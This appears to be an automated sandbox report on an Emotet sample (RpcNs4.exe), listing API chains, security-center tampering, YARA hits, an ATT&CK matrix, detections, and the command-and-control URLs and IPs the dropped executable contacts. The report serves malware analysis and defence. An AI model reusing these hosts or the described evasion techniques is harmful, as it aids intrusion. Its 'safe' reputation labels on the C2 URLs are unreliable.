                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__calloc_crt,_free,4_2_0040D16E
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,_free,_free,4_2_0041119A
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: _TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_TranslateName,_GetLocaleNameFromLangCountry,_GetLocaleNameFromLanguage,_GetLocaleNameFromDefault,IsValidCodePage,_wcschr,_wcschr,__itow_s,_LcidFromHexString,GetLocaleInfoW,4_2_004191AF
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: _memset,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_GetLcidFromCountry,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,___crtDownlevelLCIDToLocaleName,___crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,__itow_s,4_2_00419A1F
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,4_2_0041947F
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: EnumSystemLocalesW,4_2_00419423
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,4_2_0040FC2A
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: _GetPrimaryLen,EnumSystemLocalesW,4_2_004194FC
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,_free,_free,4_2_00410D5A
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: _LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,__wcsnicmp,GetLocaleInfoW,_TestDefaultLanguage,4_2_0041957F
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: EnumSystemLocalesW,4_2_0040FE0B
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: GetLocaleInfoW,4_2_0040FE91
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: _LcidFromHexString,GetLocaleInfoW,_TestDefaultLanguage,4_2_00419774
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtLCMapStringA,___crtLCMapStringA,___crtGetStringTypeA,_memmove,_memmove,_memmove,_free,_free,_free,_free,_free,_free,_free,_free,_free,4_2_00415723
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,4_2_004117D4
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_0041201C cpuid 2_2_0041201C
                      Source: C:\Users\user\Desktop\RpcNs4.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Users\user\Desktop\RpcNs4.exeCode function: 2_2_00406001 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_00406001
                      Source: C:\Windows\SysWOW64\rasphone\networkitemfactory.exeCode function: 4_2_020B5300 GetNativeSystemInfo,GetNativeSystemInfo,RtlGetVersion,4_2_020B5300

                      Lowering of HIPS / PFW / Operating System Security Settings:

                      barindex
                      Changes security center settings (notifications, updates, antivirus, firewall)Show sources
                      Source: C:\Windows\System32\svchost.exeKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center cvalJump to behavior
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::ExecNotificationQuery - ROOT\SecurityCenter : SELECT * FROM __InstanceOperationEvent WHERE TargetInstance ISA 'AntiVirusProduct' OR TargetInstance ISA 'FirewallProduct' OR TargetInstance ISA 'AntiSpywareProduct'
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : FirewallProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiVirusProduct
                      Source: C:\Windows\System32\svchost.exeWMI Queries: IWbemServices::CreateInstanceEnum - ROOT\SecurityCenter2 : AntiSpywareProduct
                      Source: svchost.exe, 0000000C.00000002.517735542.0000018992E3D000.00000004.00000001.sdmpBinary or memory string: (@V%ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: svchost.exe, 0000000C.00000002.517898237.0000018992F02000.00000004.00000001.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 2.2.RpcNs4.exe.5e279e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.RpcNs4.exe.20b0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.networkitemfactory.exe.51279e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.RpcNs4.exe.5e052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.networkitemfactory.exe.20b0000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.networkitemfactory.exe.51279e.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.RpcNs4.exe.5e052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.networkitemfactory.exe.51052e.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.networkitemfactory.exe.51052e.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 2.2.RpcNs4.exe.5e279e.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000004.00000002.517659433.0000000000510000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.256801219.00000000005F4000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.519092750.00000000020B1000.00000020.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.256746048.00000000005E0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.519022380.0000000002094000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000002.00000002.257541494.00000000020B1000.00000020.00000001.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation1Windows Service1Windows Service1Masquerading121OS Credential DumpingSystem Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationData Encrypted for Impact1
                      Default AccountsNative API11DLL Side-Loading1Process Injection2Disable or Modify Tools1LSASS MemorySecurity Software Discovery61Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Application Shimming1DLL Side-Loading1Virtualization/Sandbox Evasion2Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Application Shimming1Process Injection2NTDSProcess Discovery3Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information1LSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonHidden Files and Directories1Cached Domain CredentialsFile and Directory Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information2DCSyncSystem Information Discovery45Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobDLL Side-Loading1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)File Deletion1/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 492876 Sample: RpcNs4.exe Startdate: 29/09/2021 Architecture: WINDOWS Score: 96 25 202.153.220.157 WIDEBAND-AS-APAussieBroadbandAU Australia 2->25 27 58.27.215.3 WATEEN-IMS-PK-AS-APNationalWiMAXIMSenvironmentPK Pakistan 2->27 29 79 other IPs or domains 2->29 39 Found malware configuration 2->39 41 Antivirus / Scanner detection for submitted sample 2->41 43 Multi AV Scanner detection for submitted file 2->43 45 3 other signatures 2->45 8 RpcNs4.exe 6 2->8         started        11 svchost.exe 2->11         started        13 svchost.exe 9 1 2->13         started        16 8 other processes 2->16 signatures3 process4 dnsIp5 47 Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors) 8->47 49 Drops executables to the windows directory (C:\Windows) and starts them 8->49 51 Hides that the sample has been downloaded from the Internet (zone.identifier) 8->51 18 networkitemfactory.exe 16 8->18         started        53 Changes security center settings (notifications, updates, antivirus, firewall) 11->53 21 MpCmdRun.exe 1 11->21         started        37 127.0.0.1 unknown unknown 13->37 signatures6 process7 dnsIp8 31 162.241.41.111, 7080 UNIFIEDLAYER-AS-1US United States 18->31 33 190.85.46.52, 7080 TelmexColombiaSACO Colombia 18->33 35 4 other IPs or domains 18->35 23 conhost.exe 21->23         started        process9

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      RpcNs4.exe78%VirustotalBrowse
                      RpcNs4.exe74%MetadefenderBrowse
                      RpcNs4.exe89%ReversingLabsWin32.Trojan.Emotet
                      RpcNs4.exe100%AviraTR/AD.Emotet.dbl
                      RpcNs4.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      2.2.RpcNs4.exe.20b0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.2.networkitemfactory.exe.400000.0.unpack100%AviraHEUR/AGEN.1138861Download File
                      2.2.RpcNs4.exe.5e279e.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.2.RpcNs4.exe.400000.0.unpack100%AviraHEUR/AGEN.1138861Download File
                      4.2.networkitemfactory.exe.51052e.2.unpack100%AviraHEUR/AGEN.1142428Download File
                      2.2.RpcNs4.exe.5e052e.2.unpack100%AviraHEUR/AGEN.1142428Download File
                      4.0.networkitemfactory.exe.400000.0.unpack100%AviraHEUR/AGEN.1138861Download File
                      4.2.networkitemfactory.exe.51279e.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      4.2.networkitemfactory.exe.20b0000.3.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                      2.0.RpcNs4.exe.400000.0.unpack100%AviraHEUR/AGEN.1138861Download File

                      Domains

                      No Antivirus matches

                      URLs

                      SourceDetectionScannerLabelLink
                      http://5.189.168.53:8080/o3fBhuuz/0%Avira URL Cloudsafe
                      http://162.241.41.111:7080/LYQRy6c93vecgvHJfH5/EZsl1rJ8QXw/bisGJm2RzFKv/0FbacJYj1q62Xn/20%Avira URL Cloudsafe
                      http://172.96.190.154:8080/yTJ2v9/Gv4Y0SVYAXfP/7otgMR8dm3c0Q43/p0%Avira URL Cloudsafe
                      http://190.191.171.72/e7oyvJu0ryVUBL/0INT0lnzMU2/MpBFVePNcAJo4Omc/IfhZZOLYmyGUpB2z7/y67uuC8o/0%Avira URL Cloudsafe
                      http://172.96.190.154:8080/yTJ2v9/Gv4Y0SVYAXfP/7otgMR8dm3c0Q43/c/IfhZZOLYmyGUpB2z7/y67uuC8o/0%Avira URL Cloudsafe
                      http://5.189.168.53:8080/o3fBhuuz/m0%Avira URL Cloudsafe
                      http://5.189.168.53:8080/o3fBhuuz/i0%Avira URL Cloudsafe
                      http://190.85.46.52:7080/1CMBtWf1oEz5/0%Avira URL Cloudsafe
                      http://172.96.190.154:8080/yTJ2v9/Gv4Y0SVYAXfP/7otgMR8dm3c0Q43/0%Avira URL Cloudsafe
                      http://190.85.46.52:7080/1CMBtWf1oEz5/f0%Avira URL Cloudsafe
                      http://crl.ver)0%Avira URL Cloudsafe
                      http://172.96.190.154:8080/yTJ2v9/Gv4Y0SVYAXfP/7otgMR8dm3c0Q43/50%Avira URL Cloudsafe
                      https://%s.xboxlive.com0%URL Reputationsafe
                      http://5.189.168.53:8080/o3fBhuuz/30%Avira URL Cloudsafe
                      https://dynamic.t0%URL Reputationsafe
                      http://162.241.41.111:7080/LYQRy6c93vecgvHJfH5/EZsl1rJ8QXw/bisGJm2RzFKv/0FbacJYj1q62Xn/0%Avira URL Cloudsafe
                      http://190.85.46.52:7080/1CMBtWf1oEz5/m320%Avira URL Cloudsafe
                      http://5.189.168.53:8080/o3fBhuuz/#0%Avira URL Cloudsafe
                      http://37.205.9.252:7080/RFYvVKd2K/sy7dp7xsNv9/Rrh3Sh9wg/SwbGDOylYnDUpHudO/ri7bprIvQeGD/Bd2yo6ti2p6c0%Avira URL Cloudsafe
                      https://%s.dnet.xboxlive.com0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://5.189.168.53:8080/o3fBhuuz/networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      unknown
                      https://dev.ditu.live.com/REST/v1/Routes/svchost.exe, 0000000A.00000002.310124326.000001BD7A83D000.00000004.00000001.sdmpfalse
                        high
                        https://dev.virtualearth.net/REST/v1/Routes/Drivingsvchost.exe, 0000000A.00000003.309406967.000001BD7A85F000.00000004.00000001.sdmpfalse
                          high
                          https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashxsvchost.exe, 0000000A.00000002.310124326.000001BD7A83D000.00000004.00000001.sdmpfalse
                            high
                            https://t0.tiles.ditu.live.com/tiles/gensvchost.exe, 0000000A.00000002.310050189.000001BD7A813000.00000004.00000001.sdmpfalse
                              high
                              https://dev.virtualearth.net/REST/v1/Routes/Walkingsvchost.exe, 0000000A.00000003.309406967.000001BD7A85F000.00000004.00000001.sdmpfalse
                                high
                                http://162.241.41.111:7080/LYQRy6c93vecgvHJfH5/EZsl1rJ8QXw/bisGJm2RzFKv/0FbacJYj1q62Xn/2networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=svchost.exe, 0000000A.00000002.310130711.000001BD7A842000.00000004.00000001.sdmpfalse
                                  high
                                  http://172.96.190.154:8080/yTJ2v9/Gv4Y0SVYAXfP/7otgMR8dm3c0Q43/pnetworkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  http://190.191.171.72/e7oyvJu0ryVUBL/0INT0lnzMU2/MpBFVePNcAJo4Omc/IfhZZOLYmyGUpB2z7/y67uuC8o/networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://dev.ditu.live.com/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.309406967.000001BD7A85F000.00000004.00000001.sdmpfalse
                                    high
                                    https://dev.ditu.live.com/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000003.309425425.000001BD7A849000.00000004.00000001.sdmpfalse
                                      high
                                      https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=svchost.exe, 0000000A.00000003.287622580.000001BD7A830000.00000004.00000001.sdmpfalse
                                        high
                                        https://dev.virtualearth.net/REST/v1/Transit/Schedules/svchost.exe, 0000000A.00000002.310130711.000001BD7A842000.00000004.00000001.sdmpfalse
                                          high
                                          http://172.96.190.154:8080/yTJ2v9/Gv4Y0SVYAXfP/7otgMR8dm3c0Q43/c/IfhZZOLYmyGUpB2z7/y67uuC8o/networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://5.189.168.53:8080/o3fBhuuz/mnetworkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          http://5.189.168.53:8080/o3fBhuuz/inetworkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpfalse
                                          • Avira URL Cloud: safe
                                          unknown
                                          https://appexmapsappupdate.blob.core.windows.netsvchost.exe, 0000000A.00000003.309406967.000001BD7A85F000.00000004.00000001.sdmpfalse
                                            high
                                            http://190.85.46.52:7080/1CMBtWf1oEz5/networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://172.96.190.154:8080/yTJ2v9/Gv4Y0SVYAXfP/7otgMR8dm3c0Q43/networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpfalse
                                            • Avira URL Cloud: safe
                                            unknown
                                            http://www.bingmapsportal.comsvchost.exe, 0000000A.00000002.310050189.000001BD7A813000.00000004.00000001.sdmpfalse
                                              high
                                              https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/svchost.exe, 0000000A.00000003.287622580.000001BD7A830000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.310124326.000001BD7A83D000.00000004.00000001.sdmpfalse
                                                high
                                                https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashxsvchost.exe, 0000000A.00000003.309406967.000001BD7A85F000.00000004.00000001.sdmpfalse
                                                  high
                                                  https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000003.309474542.000001BD7A845000.00000004.00000001.sdmpfalse
                                                    high
                                                    http://190.85.46.52:7080/1CMBtWf1oEz5/fnetworkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    unknown
                                                    https://dev.virtualearth.net/REST/v1/Routes/svchost.exe, 0000000A.00000002.310124326.000001BD7A83D000.00000004.00000001.sdmpfalse
                                                      high
                                                      https://dev.virtualearth.net/REST/v1/Traffic/Incidents/svchost.exe, 0000000A.00000003.287622580.000001BD7A830000.00000004.00000001.sdmpfalse
                                                        high
                                                        https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000003.309474542.000001BD7A845000.00000004.00000001.sdmpfalse
                                                          high
                                                          http://crl.ver)svchost.exe, 00000005.00000002.519834016.000001A00E260000.00000004.00000001.sdmpfalse
                                                          • Avira URL Cloud: safe
                                                          low
                                                          https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?svchost.exe, 0000000A.00000003.309425425.000001BD7A849000.00000004.00000001.sdmpfalse
                                                            high
                                                            http://172.96.190.154:8080/yTJ2v9/Gv4Y0SVYAXfP/7otgMR8dm3c0Q43/5networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000002.310050189.000001BD7A813000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.310124326.000001BD7A83D000.00000004.00000001.sdmpfalse
                                                              high
                                                              https://%s.xboxlive.comsvchost.exe, 00000008.00000002.517751023.0000023333643000.00000004.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              low
                                                              https://dev.virtualearth.net/REST/v1/Locationssvchost.exe, 0000000A.00000003.309406967.000001BD7A85F000.00000004.00000001.sdmpfalse
                                                                high
                                                                https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=svchost.exe, 0000000A.00000003.287622580.000001BD7A830000.00000004.00000001.sdmpfalse
                                                                  high
                                                                  https://dev.virtualearth.net/mapcontrol/logging.ashxsvchost.exe, 0000000A.00000003.309406967.000001BD7A85F000.00000004.00000001.sdmpfalse
                                                                    high
                                                                    https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 0000000A.00000003.309425425.000001BD7A849000.00000004.00000001.sdmpfalse
                                                                      high
                                                                      https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 0000000A.00000003.287622580.000001BD7A830000.00000004.00000001.sdmpfalse
                                                                        high
                                                                        http://5.189.168.53:8080/o3fBhuuz/3networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://dynamic.tsvchost.exe, 0000000A.00000003.309396699.000001BD7A862000.00000004.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://162.241.41.111:7080/LYQRy6c93vecgvHJfH5/EZsl1rJ8QXw/bisGJm2RzFKv/0FbacJYj1q62Xn/networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        http://190.85.46.52:7080/1CMBtWf1oEz5/m32networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 0000000A.00000003.309406967.000001BD7A85F000.00000004.00000001.sdmpfalse
                                                                          high
                                                                          https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 0000000A.00000002.310115050.000001BD7A839000.00000004.00000001.sdmpfalse
                                                                            high
                                                                            http://5.189.168.53:8080/o3fBhuuz/#networkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 0000000A.00000003.309425425.000001BD7A849000.00000004.00000001.sdmpfalse
                                                                              high
                                                                              http://37.205.9.252:7080/RFYvVKd2K/sy7dp7xsNv9/Rrh3Sh9wg/SwbGDOylYnDUpHudO/ri7bprIvQeGD/Bd2yo6ti2p6cnetworkitemfactory.exe, 00000004.00000002.519541263.000000000259D000.00000004.00000001.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              unknown
                                                                              https://activity.windows.comsvchost.exe, 00000008.00000002.517751023.0000023333643000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 0000000A.00000003.309406967.000001BD7A85F000.00000004.00000001.sdmpfalse
                                                                                  high
                                                                                  https://%s.dnet.xboxlive.comsvchost.exe, 00000008.00000002.517751023.0000023333643000.00000004.00000001.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  low
                                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 0000000A.00000003.309425425.000001BD7A849000.00000004.00000001.sdmpfalse
                                                                                    high

                                                                                    Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    126.126.139.26
                                                                                    unknownJapan17676GIGAINFRASoftbankBBCorpJPtrue
                                                                                    192.210.217.94
                                                                                    unknownUnited States
                                                                                    36352AS-COLOCROSSINGUStrue
                                                                                    223.17.215.76
                                                                                    unknownHong Kong
                                                                                    18116HGC-AS-APHGCGlobalCommunicationsLimitedHKtrue
                                                                                    185.208.226.142
                                                                                    unknownHungary
                                                                                    43359TARHELYHUtrue
                                                                                    14.241.182.160
                                                                                    unknownViet Nam
                                                                                    45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                    75.127.14.170
                                                                                    unknownUnited States
                                                                                    36352AS-COLOCROSSINGUStrue
                                                                                    172.96.190.154
                                                                                    unknownCanada
                                                                                    59253LEASEWEB-APAC-SIN-11LeasewebAsiaPacificpteltdSGtrue
                                                                                    78.114.175.216
                                                                                    unknownFrance
                                                                                    8228CEGETEL-ASFRtrue
                                                                                    51.38.201.19
                                                                                    unknownFrance
                                                                                    16276OVHFRtrue
                                                                                    200.116.93.61
                                                                                    unknownColombia
                                                                                    13489EPMTelecomunicacionesSAESPCOtrue
                                                                                    115.78.11.155
                                                                                    unknownViet Nam
                                                                                    7552VIETEL-AS-APViettelGroupVNtrue
                                                                                    203.153.216.178
                                                                                    unknownIndonesia
                                                                                    45291SURF-IDPTSurfindoNetworkIDtrue
                                                                                    190.191.171.72
                                                                                    unknownArgentina
                                                                                    10481TelecomArgentinaSAARtrue
                                                                                    220.147.247.145
                                                                                    unknownJapan2510INFOWEBFUJITSULIMITEDJPtrue
                                                                                    143.95.101.72
                                                                                    unknownUnited States
                                                                                    62729ASMALLORANGE1UStrue
                                                                                    5.189.168.53
                                                                                    unknownGermany
                                                                                    51167CONTABODEtrue
                                                                                    113.156.82.32
                                                                                    unknownJapan2516KDDIKDDICORPORATIONJPtrue
                                                                                    103.229.73.17
                                                                                    unknownIndonesia
                                                                                    55660MWN-AS-IDPTMasterWebNetworkIDtrue
                                                                                    182.227.240.189
                                                                                    unknownKorea Republic of
